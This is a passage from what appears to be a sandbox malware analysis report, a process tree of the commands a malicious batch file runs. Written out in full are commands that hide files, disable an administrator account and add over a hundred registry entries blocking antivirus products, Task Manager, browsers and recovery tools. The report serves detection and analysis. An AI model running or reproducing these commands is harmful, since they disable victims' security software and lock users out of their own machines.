    nircmd win hide title "C:\Windows\system32\cmd.exe"
    3⤵
    - Executes dropped EXE
    PID:4484
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\Windows\PkgMgr.bat +h +s +a +r
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:736
- - C:\Windows\SysWOW64\net.exe
    net user ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç /active:no
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:8
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç /active:no
      4⤵
      PID:4584
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v HideFastUserSwitching /t REG_DWORD /d "1"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun"
    3⤵
    - Blocks application from running via registry modification
    PID:4832
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /f /v "DisallowRun" /t REG_DWORD /d "1"
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MSASCui.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3184
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "msmpeng.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1576
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "msdt.exe" /f
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "ProcessHacker.exe" /f
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "spideragent.exe " /f
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "SbieSvc.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:3848
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "SearchUI.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:4612
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "8" /t REG_SZ /d "dwscanner.exe" /f
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "9" /t REG_SZ /d "aswEngSrv.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:748
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "10" /t REG_SZ /d "AvastSvc.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1168
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "11" /t REG_SZ /d "AvastUI.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3356
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "12" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "13" /t REG_SZ /d "chrome.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3168
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "14" /t REG_SZ /d "VirtualBox.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3076
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "15" /t REG_SZ /d "CCleaner64.exe" /f
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "16" /t REG_SZ /d "CCleaner32.exe" /f
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "17" /t REG_SZ /d "CCleaner86.exe" /f
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "18" /t REG_SZ /d "CCleaner.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1032
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "19" /t REG_SZ /d "firefox.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2980
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "20" /t REG_SZ /d "taskmgr.exe" /f
    3⤵
    PID:824
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "21" /t REG_SZ /d "opera.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3024
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "22" /t REG_SZ /d "iexplore.exe" /f
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "23" /t REG_SZ /d "perfmon.exe" /f
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "24" /t REG_SZ /d "msconfig.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1896
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "25" /t REG_SZ /d "WUDFHost.exe" /f
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "26" /t REG_SZ /d "msconfig.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3416
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "27" /t REG_SZ /d "SecurityHealthSystray.exe" /f
    3⤵
    PID:64
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "28" /t REG_SZ /d "rstrui.exe" /f
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "29" /t REG_SZ /d "mcapexe.exe" /f
    3⤵
    PID:3448
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "30" /t REG_SZ /d "McCSPServiceHost.exe " /f
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "31" /t REG_SZ /d "McInstruTrack.exe" /f
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "32" /t REG_SZ /d "McPvTray.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "33" /t REG_SZ /d "mcshield.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:5088
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "34" /t REG_SZ /d "McUICnt.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "35" /t REG_SZ /d "MfeAVSvc.exe " /f
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "36" /t REG_SZ /d "mfefire.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:2160
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "37" /t REG_SZ /d "mfevtps.exe " /f
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "38" /t REG_SZ /d "MMSSHOST.exe " /f
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "39" /t REG_SZ /d "ModuleCoreService.exe" /f
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "40" /t REG_SZ /d "control.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4576
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "41" /t REG_SZ /d "avp.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:3304
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "42" /t REG_SZ /d "avpui.exe " /f
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "43" /t REG_SZ /d "kav.exe" /f
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "44" /t REG_SZ /d "vmware.exe" /f
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "45" /t REG_SZ /d "msinfo32.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3336
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "46" /t REG_SZ /d "RecoveryDrive.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4800
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "47" /t REG_SZ /d "dwscanner.exe" /f
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "48" /t REG_SZ /d "spideragent.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:652
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "49" /t REG_SZ /d "uTorrent.exe" /f
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "50" /t REG_SZ /d "firefox.exe" /f
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "51" /t REG_SZ /d "regedt32.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4060
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "52" /t REG_SZ /d "resmon.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "53" /t REG_SZ /d "Defender.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:3468
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "54" /t REG_SZ /d "DefenderDaemon.exe" /f
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "55" /t REG_SZ /d "mbam.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3672
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "56" /t REG_SZ /d "mbamtray.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "57" /t REG_SZ /d "MBAMWsc.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3740
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "58" /t REG_SZ /d "mbuns.exe" /f
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "59" /t REG_SZ /d "MbamPt.exe" /f
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "60" /t REG_SZ /d "MBAMService.exe" /f
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "61" /t REG_SZ /d "assistant.exe" /f
    3⤵
    PID:3872
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "62" /t REG_SZ /d "malwarebytes_assistant.exe" /f
    3⤵
    PID:3968
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "63" /t REG_SZ /d "ig.exe" /f
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "64" /t REG_SZ /d "browser.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3784
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "65" /t REG_SZ /d "am800.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:396
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "66" /t REG_SZ /d "TOTALCMD64.EXE" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1520
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "67" /t REG_SZ /d "TOTALCMD32.EXE" /f
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "68" /t REG_SZ /d "TOTALCMD86.EXE" /f
    3⤵
    PID:404
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "69" /t REG_SZ /d "WatchDog.exe" /f
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "70" /t REG_SZ /d "ProductAgentUI.exe" /f
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "71" /t REG_SZ /d "ProductAgentService.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3852
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "72" /t REG_SZ /d "DiscoverySrv.exe" /f
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "73" /t REG_SZ /d "BDSubWiz.exe" /f
    3⤵
    PID:4636
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "74" /t REG_SZ /d "bdreinit.exe" /f
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "75" /t REG_SZ /d "agentpackage.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4640
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "76" /t REG_SZ /d "setuppackage.exe" /f
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "77" /t REG_SZ /d "7zFM.exe" /f
    3⤵
    PID:3656
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "78" /t REG_SZ /d "procexp64.exe" /f
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "79" /t REG_SZ /d "procexp.exe" /f
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "80" /t REG_SZ /d "WinRAR.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "81" /t REG_SZ /d "BdVpnService.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:3824
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "82" /t REG_SZ /d "BdVpnApp.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:4232
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "83" /t REG_SZ /d "bdservicehost.exe" /f
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "84" /t REG_SZ /d "bdagent.exe" /f
    3⤵
    PID:1032
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "85" /t REG_SZ /d "bdredline.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1036
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "86" /t REG_SZ /d "ekrn.exe " /f
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "87" /t REG_SZ /d "eguiProxy.exe" /f
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "88" /t REG_SZ /d "egui.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2960
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "89" /t REG_SZ /d "AvastNM.exe" /f
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "90" /t REG_SZ /d "AVGBrowserCrashHandler.exe" /f
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "91" /t REG_SZ /d "AVGBrowserCrashHandler64.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2824
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "92" /t REG_SZ /d "AVGUI.exe" /f
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "93" /t REG_SZ /d "AVGSvc.exe" /f
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "94" /t REG_SZ /d "aswEngSrv.exe" /f
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "95" /t REG_SZ /d "wsc_proxy.exe" /f
    3⤵
    PID:400
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "96" /t REG_SZ /d "am807.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2536
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "97" /t REG_SZ /d "artmoney.exe" /f
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "98" /t REG_SZ /d "chemax.exe" /f
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "99" /t REG_SZ /d "Cheat Engine.exe" /f
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "100" /t REG_SZ /d "aswidsagent.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4748
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "101" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2036
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "102" /t REG_SZ /d "AvastBrowserCrashHandler64.exe" /f
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "103" /t REG_SZ /d "AvastBrowserCrashHandler32.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4444
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "104" /t REG_SZ /d "AvastBrowserCrashHandler86.exe" /f
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "105" /t REG_SZ /d "MSASCui.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1836
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "106" /t REG_SZ /d "msdt.exe" /f
    3⤵
    PID:3888
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "107" /t REG_SZ /d "MRT.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:5048
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "108" /t REG_SZ /d "msiexec.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4984
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "109" /t REG_SZ /d "msseces.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2984
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "110" /t REG_SZ /d "control.exe" /f
    3⤵
    PID:212
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "111" /t REG_SZ /d "mmc.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1972
- - C:\Windows\SysWOW64\reg.exe
